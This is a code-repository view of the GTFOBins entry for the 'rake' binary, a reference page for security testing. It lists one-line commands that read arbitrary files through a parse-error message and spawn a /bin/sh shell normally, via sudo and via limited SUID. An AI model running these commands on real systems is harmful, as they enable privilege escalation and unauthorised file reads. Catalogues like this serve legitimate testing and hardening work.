This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
2c1efe6afde4e874468984dcc39a26a3d4cf5531
GTFOBins.github.io
/
_gtfobins
/
rake.md
LinuxSploit
0b196471f8
Add rake file-read
...
Co-authored-by: Andrea Cardaci <
cyrus.and@gmail.com
>
2021-07-17 08:42:47 +02:00
352 B
Raw
Blame
History
functions
functions
file-read
shell
sudo
limited-suid
description
code
The file is actually parsed and the first wrong line is returned in an error message.
LFILE=file-to-read rake -f $LFILE
code
rake -p '`/bin/sh 1>&0`'
code
sudo rake -p '`/bin/sh 1>&0`'
code
./rake -p '`/bin/sh 1>&0`'
Reference in New Issue
View Git Blame
Copy Permalink